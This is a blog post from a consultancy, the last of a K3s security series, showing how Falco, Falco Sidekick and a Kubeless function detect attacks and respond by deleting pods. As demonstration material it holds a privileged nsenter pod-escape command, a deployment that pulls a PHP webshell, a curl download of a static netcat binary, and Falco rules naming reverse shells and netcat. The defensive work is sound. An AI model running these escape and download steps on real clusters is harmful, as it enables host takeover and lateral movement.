- Part 1: Deploying K3s, network and host machine security configuration

- Part 2: K3s Securing the cluster

- Part 3: Creating a security responsive K3s cluster



This is the final post in a three-part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In part 1 we secured the network and the host operating system and deployed k3s. In part 2 we hardened the cluster further, up to the application level. Now, in the final part, we will leverage some great tools to create a security responsive cluster. Note that a fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.

If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.

Create a security responsive cluster

Introduction

In the previous blog we saw the huge benefits of tidying up our cluster and securing it following the best recommendations from the CIS Benchmark for Kubernetes. We also saw how we cannot cover everything, for example a bad actor stealing the administrator account token for the APIs.

Let’s recap the POD escaping technique used in the previous part, using the administrator account:

~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [
      {
        "name": "busybox",
        "image": "alpine:3.7",
        "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
        "stdin": true,
        "tty": true,
        "resources": {"requests": {"cpu": "10m"}},
        "securityContext": {
          "privileged": true
        }
      }
    ]
  }
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#

Not good. We could create a specific PSP that disallows exec, but that would hinder the internal use of the privileged account.

Is there anything else we can do?

Enter Falco

No, not this one!

Falco is a cloud-native runtime security project, and is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.

Beyond that, Falco also monitors our system by parsing Linux system calls from the kernel (using either a kernel module or eBPF) and uses its powerful rule engine to create alerts.

Installation

Installing it is pretty straightforward:

- name: Install Falco repo /rpm-key
  rpm_key:
    state: present
    key: https://falco.org/repo/falcosecurity-3672BA8F.asc

- name: Install Falco repo /rpm-repo
  get_url:
    url: https://falco.org/repo/falcosecurity-rpm.repo
    dest: /etc/yum.repos.d/falcosecurity.repo

- name: Install falco on control plane
  package:
    state: present
    name: falco

- name: Check if driver is loaded
  shell: |
    set -o pipefail
    lsmod | grep falco
  changed_when: no
  failed_when: no
  register: falco_module

We will install Falco directly on our hosts to keep it separate from the Kubernetes cluster, which gives us a little more separation between the security layer and the application layer. If you do not have access to the underlying nodes, it can also be installed quite easily as a DaemonSet using the official Helm chart.

Then we will configure Falco to talk with our APIs by modifying the service file:

[Unit]
Description=Falco: Container Native Runtime Security
Documentation=https://falco.org/docs/

[Service]
Type=simple
User=root
ExecStartPre=/sbin/modprobe falco
ExecStart=/usr/bin/falco --pidfile=/var/run/falco.pid --k8s-api-cert=/etc/falco/token \
  --k8s-api https://{{ keepalived_ip }}:6443 -pk
ExecStopPost=/sbin/rmmod falco
UMask=0077
# Rest of the file omitted for brevity
[...]

We will create an admin ServiceAccount and provide the token to Falco to authenticate it for the API calls.

Alerting



We will install Falco Sidekick in the cluster. It is a simple daemon that extends the outputs available to Falco: it takes a Falco event and forwards it to different outputs. For the sake of simplicity, we will just configure Sidekick to notify us on Slack when something is wrong.

It works as a single endpoint for as many falco instances as you want:

In the inventory just set the following variable

falco_sidekick_slack: "https://hooks.slack.com/services/XXXXX-XXXX-XXXX"





# This is a secret and should be Vaulted!Now let’s see what happens when we deploy the previous escaping POD

Enter Kubeless

What can we do with it? We will deploy a Python function that Falco Sidekick calls whenever something happens.
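To make the hand-off concrete, here is a minimal sketch of the kind of payload such a function might receive. The field names `rule`, `priority`, `output` and `output_fields` follow Falco's JSON output; the sample values and the helper name `summarise_event` are invented for illustration, and the assumption that the decoded body arrives under `event['data']` is taken from the function shown later in this post.

```python
import json

# Hypothetical sample of a Falco alert as forwarded by Falco Sidekick.
SAMPLE_BODY = json.dumps({
    "rule": "Terminal shell in container",
    "priority": "Notice",
    "output": "A shell was spawned in a container (example text)",
    "output_fields": {
        "k8s.ns.name": "default",
        "k8s.pod.name": "php-66f85644d-2ffbt",
    },
})


def summarise_event(event):
    """Return (rule, namespace, pod) from a Kubeless-style event dict."""
    data = event.get("data") or {}
    fields = data.get("output_fields") or {}
    return (
        data.get("rule"),
        fields.get("k8s.ns.name"),
        fields.get("k8s.pod.name"),
    )


# Assumption: the function runtime hands us the decoded JSON under "data".
event = {"data": json.loads(SAMPLE_BODY)}
print(summarise_event(event))
```

Using `.get` with fallbacks means a malformed or partial event yields `None` values instead of raising, which is a convenient property for a function that is triggered by every alert.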

Let’s deploy Kubeless on our cluster following the task in roles/k3s-deploy/tasks/kubeless.yml, or simply with the command:

~ $ kubectl apply -f https://github.com/kubeless/kubeless/releases/download/v1.0.8/kubeless-v1.0.8.yaml

And let’s not forget to create the corresponding RoleBindings and PSPs for it, as it will need some superpowers to run on our cluster.

After Kubeless deployment is completed we can proceed to deploy our function.

Let’s start simple and just react to a pod Attach or Exec:

# code skipped for brevity
[ ...]

def pod_delete(event, context):
    rule = event['data']['rule'] or None
    output_fields = event['data']['output_fields'] or None

    if rule and output_fields:
        if (rule == "Attach/Exec Pod" or rule == "Create HostNetwork Pod"):
            if output_fields['ka.target.name'] and output_fields[
                    'ka.target.namespace']:
                pod = output_fields['ka.target.name']
                namespace = output_fields['ka.target.namespace']
                print(
                    f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                )
                client.CoreV1Api().delete_namespaced_pod(
                    name=pod,
                    namespace=namespace,
                    body=client.V1DeleteOptions(),
                    grace_period_seconds=0
                )
                send_slack(
                    rule, pod, namespace, event['data']['output'],
                    time.time_ns()
                )

Then deploy it to kubeless.
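The function above calls `send_slack`, whose body is skipped in this post. As a rough idea of what such a helper could look like, the sketch below builds and posts a Slack incoming-webhook message. It is not the author's implementation: the function names, the message layout and the `dry_run` flag are assumptions made for this example; only the idea of posting JSON with a `text` field to the webhook URL comes from Slack's incoming-webhook format.

```python
import json
import urllib.request


def build_slack_payload(rule, pod, namespace, output, event_time):
    """Build the JSON body for a Slack incoming webhook (hypothetical layout)."""
    text = (
        f'Rule "{rule}" fired at {event_time}: '
        f'deleted pod "{pod}" in namespace "{namespace}"\n{output}'
    )
    return {"text": text}


def send_slack_sketch(webhook_url, payload, dry_run=True):
    """Prepare a POST to Slack; with dry_run=True nothing is sent."""
    request = urllib.request.Request(
        webhook_url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    if not dry_run:
        # Only here does the sketch touch the network.
        urllib.request.urlopen(request, timeout=5).close()
    return request


payload = build_slack_payload(
    "Attach/Exec Pod", "hostname-sudo", "default", "example output", 0
)
request = send_slack_sketch(
    "https://hooks.slack.com/services/XXXXX-XXXX-XXXX", payload
)
print(request.get_method(), payload["text"])
```

Keeping the payload construction separate from the network call makes the message format easy to test without a real webhook.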

First steps

Let’s try our escaping POD from administrator account again

~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '

{

"spec": {

"hostPID": true,

"hostNetwork": true,

"containers": [

{

"name": "busybox",

"image": "alpine:3.7",

"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],

"stdin": true,

"tty": true,

"resources": {"requests": {"cpu": "10m"}},

"securityContext": {

"privileged": true

}

}

]

}

}' --rm --attach

If you don't see a command prompt, try pressing enter.



[root@worker01 /]#We will receive this on Slack



The POD is killed and the process exits immediately. We limited the damage by responding automatically and quickly to a fishy situation.

Watching the host

Falco will also keep an eye on the base host, alerting us if protected files are opened or strange processes, such as network scanners, are spawned.



Internet is not a safe place



Exposing our shiny new service running on our new cluster is not all sunshine and roses. We could have done all in our power to secure the cluster, but what if the services deployed in the cluster are vulnerable?

Here in this example we will deploy a PHP website that simulates the presence of a Remote Command Execution (RCE) vulnerability. Those are quite common and not to be underestimated.

A web app with a vulnerability

Let’s deploy this simple service with our non-privileged user:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: php
  labels:
    tier: backend
spec:
  replicas: 1
  selector:
    matchLabels:
      app: php
      tier: backend
  template:
    metadata:
      labels:
        app: php
        tier: backend
    spec:
      automountServiceAccountToken: true
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
      volumes:
        - name: code
          persistentVolumeClaim:
            claimName: code
      containers:
        - name: php
          image: php:7-fpm
          volumeMounts:
            - name: code
              mountPath: /code
      initContainers:
        - name: install
          image: busybox
          volumeMounts:
            - name: code
              mountPath: /code
          command:
            - wget
            - "-O"
            - "/code/index.php"
            - "https://raw.githubusercontent.com/alegrey91/systemd-service-hardening/master/ansible/files/webshell.php"

The file demo/php.yaml will also contain the nginx container to run the app and an external ingress definition for it.

~ $ kubectl-user get pods,svc,ingress
NAME                         READY   STATUS    RESTARTS   AGE
pod/nginx-64d59b466c-lm8ll   1/1     Running   0          3m9s
pod/php-66f85644d-2ffbt      1/1     Running   0          3m10s

NAME                TYPE        CLUSTER-IP    EXTERNAL-IP   PORT(S)    AGE
service/nginx-php   ClusterIP   10.44.38.54   <none>        8080/TCP   3m9s
service/php         ClusterIP   10.44.98.87   <none>        9000/TCP   3m10s

NAME                                             HOSTS                          ADDRESS         PORTS   AGE
ingress.networking.k8s.io/security-pod-ingress   testweb.192.168.1.200.nip.io   192.168.1.200   80

Adapt our function



Now let’s adapt our function to respond to a more varied selection of rules firing from Falco.

# code skipped for brevity
[ ...]

def pod_delete(event, context):
    rule = event['data']['rule'] or None
    output_fields = event['data']['output_fields'] or None

    if rule and output_fields:
        if (
            rule == "Debugfs Launched in Privileged Container" or
            rule == "Launch Package Management Process in Container" or
            rule == "Launch Remote File Copy Tools in Container" or
            rule == "Launch Suspicious Network Tool in Container" or
            rule == "Mkdir binary dirs" or rule == "Modify binary dirs" or
            rule == "Mount Launched in Privileged Container" or
            rule == "Netcat Remote Code Execution in Container" or
            rule == "Read sensitive file trusted after startup" or
            rule == "Read sensitive file untrusted" or
            rule == "Run shell untrusted" or
            rule == "Sudo Potential Privilege Escalation" or
            rule == "Terminal shell in container" or
            rule == "The docker client is executed in a container" or
            rule == "User mgmt binaries" or
            rule == "Write below binary dir" or
            rule == "Write below etc" or
            rule == "Write below monitored dir" or
            rule == "Write below root" or
            rule == "Create files below dev" or
            rule == "Redirect stdout/stdin to network connection" or
            rule == "Reverse shell" or
            rule == "Code Execution from TMP folder in Container" or
            rule == "Suspect Renamed Netcat Remote Code Execution in Container"
        ):
            if output_fields['k8s.ns.name'] and output_fields['k8s.pod.name']:
                pod = output_fields['k8s.pod.name']
                namespace = output_fields['k8s.ns.name']
                print(
                    f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
                )
                client.CoreV1Api().delete_namespaced_pod(
                    name=pod,
                    namespace=namespace,
                    body=client.V1DeleteOptions(),
                    grace_period_seconds=0
                )
                send_slack(
                    rule, pod, namespace, event['data']['output'],
                    output_fields['evt.time']
                )

# code skipped for brevity
[ ...]

The complete function file is here: roles/k3s-deploy/templates/kubeless/falco_function.yaml.j2
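The long chain of `or` comparisons can also be expressed as a set membership test, which may make the rule list easier to maintain as it grows. The following is a minimal sketch under the same event layout as the function above; the names `POD_KILL_RULES` and `target_pod` are made up for this example, the rule list is abbreviated, and the function only decides which pod would be deleted rather than calling the Kubernetes API.

```python
# Abbreviated, illustrative subset of the Falco rules that trigger a response.
POD_KILL_RULES = frozenset({
    "Launch Package Management Process in Container",
    "Launch Suspicious Network Tool in Container",
    "Terminal shell in container",
    "Suspect Renamed Netcat Remote Code Execution in Container",
})


def target_pod(event):
    """Return (namespace, pod) to delete, or None if no action is needed."""
    data = event.get("data") or {}
    fields = data.get("output_fields") or {}
    if data.get("rule") not in POD_KILL_RULES:
        return None
    namespace = fields.get("k8s.ns.name")
    pod = fields.get("k8s.pod.name")
    if not (namespace and pod):
        # Events without pod metadata leave nothing to delete.
        return None
    return namespace, pod


example = {
    "data": {
        "rule": "Terminal shell in container",
        "output_fields": {
            "k8s.ns.name": "default",
            "k8s.pod.name": "php-66f85644d-2ffbt",
        },
    }
}
print(target_pod(example))
```

Separating the decision from the deletion also makes it possible to unit test the rule list without a cluster.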

Preparing an attack

What can we do from here? Well, first we could try to call the Kubernetes APIs, but thanks to our previous hardening steps, anonymous querying is denied and ServiceAccount token automounting is disabled.



But we can still try to poke around the network! The first step is to use nmap to scan the surrounding network and see if we can do any lateral movement. Let’s install it!





Never gonna give up

We cannot use the package manager? Well, we can still download a statically linked, precompiled binary to use inside the container! Let’s head to this repo: https://github.com/andrew-d/static-binaries/, where we will find a healthy collection of tools that we can use to do naughty things!

Let’s use them. With this command in the webshell we will download netcat:

curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/ncat \
  --output nc

Let’s try using the binary downloaded above.

We will rename it to unnamedbin. Just launching it to print its help shows that it really works.

Custom rules

Custom rules in Falco are quite straightforward: they are written in YAML rather than a custom DSL, and the documentation at https://falco.org/docs/ is exhaustive and clearly written.

Let’s try to create a “Suspect Renamed Netcat Remote Code Execution in Container” rule:

- rule: Suspect Renamed Netcat Remote Code Execution in Container
  desc: Netcat Program runs inside container that allows remote code execution
  condition: >
    spawned_process and container and
    ((proc.args contains "ash" or
    proc.args contains "bash" or
    proc.args contains "csh" or
    proc.args contains "ksh" or
    proc.args contains "/bin/sh" or
    proc.args contains "tcsh" or
    proc.args contains "zsh" or
    proc.args contains "dash") and
    (proc.args contains "-e" or
    proc.args contains "-c" or
    proc.args contains "--sh-exec" or
    proc.args contains "--exec" or
    proc.args contains "-c " or
    proc.args contains "--lua-exec"))
  output: >
    Suspect Reverse shell using renamed netcat runs inside container that allows remote code execution (user=%user.name user_loginuid=%user.loginuid
    command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [network, process, mitre_execution]
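To get a feel for what this condition matches, the following sketch re-implements its two `proc.args contains` groups as plain substring tests. It is only an approximation for reasoning about the rule, not how Falco evaluates it: the helper name and the sample argument strings are invented, and the `spawned_process and container` part of the condition is ignored.

```python
# The two groups of substrings taken from the rule's condition.
SHELL_HINTS = ("ash", "bash", "csh", "ksh", "/bin/sh", "tcsh", "zsh", "dash")
EXEC_FLAGS = ("-e", "-c", "--sh-exec", "--exec", "-c ", "--lua-exec")


def looks_like_renamed_netcat(proc_args):
    """Mimic the rule: a shell name AND an exec-style flag appear in the args."""
    has_shell = any(hint in proc_args for hint in SHELL_HINTS)
    has_exec_flag = any(flag in proc_args for flag in EXEC_FLAGS)
    return has_shell and has_exec_flag


samples = [
    "-e /bin/bash 192.168.1.50 4444",  # reverse-shell style arguments
    "--help",                          # harmless invocation
    "--color flash.txt",               # substring collision: "-c" and "ash"
]
for args in samples:
    print(f"{args!r}: {looks_like_renamed_netcat(args)}")
```

Because the rule cannot rely on the process name (the binary has been renamed), it matches on arguments alone, and substring matching is broad. The third sample shows how an unrelated command could also trigger it, so a rule like this is likely to need tuning over time.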

Checkpoint

Conclusion

There’s no perfect security. The rule is simple: “If it’s connected, it’s vulnerable.”

So it’s our job to always keep an eye on our clusters, enable monitoring and alerting, and groom our set of rules over time. That will make the cluster smarter in dangerous situations, or simply alert us to new things.

This series does not cover other important parts of your application lifecycle, such as Docker image scanning and SonarQube integration in your CI/CD pipeline, which help avoid having vulnerable applications in the cluster in the first place. Nor does it cover operational activities during your cluster lifecycle, such as defining Network Policies for your deployments and correctly creating Cluster Roles with the “principle of least privilege” always in mind.

This series of posts should give you an idea of the best practices (always evolving) and of the risks and responsibilities you have when deploying Kubernetes in an on-premises server room. If you would like help, please reach out!

The complete playbook is available in the repo at https://github.com/digitalis-io/k3s-on-prem-production
